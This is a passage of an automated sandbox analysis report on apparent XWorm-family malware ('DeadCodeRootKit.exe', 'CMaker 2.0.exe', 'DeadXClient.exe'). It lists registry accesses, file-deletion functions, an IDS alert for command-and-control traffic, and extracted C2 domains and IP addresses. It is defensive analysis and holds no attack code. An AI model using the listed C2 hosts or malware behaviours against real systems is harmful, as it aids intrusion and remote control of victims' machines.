                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABE6B80 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF6FABE6B80
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABE76F0 FindFirstFileExW,FindClose,2_2_00007FF6FABE76F0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FAC01674 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF6FAC01674
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABE76F0 FindFirstFileExW,FindClose,5_2_00007FF6FABE76F0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABE6B80 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF6FABE6B80
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FAC01674 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF6FAC01674
                        Source: C:\Users\Public\DeadXClient.exeCode function: 6_2_1C59BF5C FindFirstFileExW,6_2_1C59BF5C

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49997 -> 147.185.221.21:28600
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: updates-full.gl.at.ply.gg
                        Yara detected Generic Downloader
                        Source: Yara matchFile source: 7.0.DeadROOTkit.exe.dd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.1.exe.2ff5330.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
                        Source: global trafficTCP traffic: 192.168.2.6:49766 -> 147.185.221.21:28600
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                        Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                        Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                        Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: dashboard.botghost.com
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: global trafficDNS traffic detected: DNS query: subscribe-bond.gl.at.ply.gg
                        Source: CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34CDD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2260123822.0000022D35540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
                        Source: svchost.exe, 0000001E.00000000.2410640572.0000022E69012000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                        Source: CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
                        Source: CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digiK
                        Source: CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
                        Source: CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.coK
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C018D000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C018B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2641944751.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3480257222.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2632123712.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2325649964.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                        Source: lsass.exe, 00000014.00000002.3484275684.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3472734902.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2327539653.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323428537.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                        Source: lsass.exe, 00000014.00000000.2324334654.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3476204379.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2631789089.000002D6F0C48000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                        Source: lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2641944751.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3472203869.000002D6F066E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3480257222.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323371929.000002D6F066E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2325649964.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                        Source: lsass.exe, 00000014.00000000.2324334654.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3476204379.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2631789089.000002D6F0C48000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
                        Source: lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2641944751.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3480257222.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2632123712.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2325649964.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                        Source: lsass.exe, 00000014.00000002.3484275684.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3472734902.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2327539653.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323428537.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C018D000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C018B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 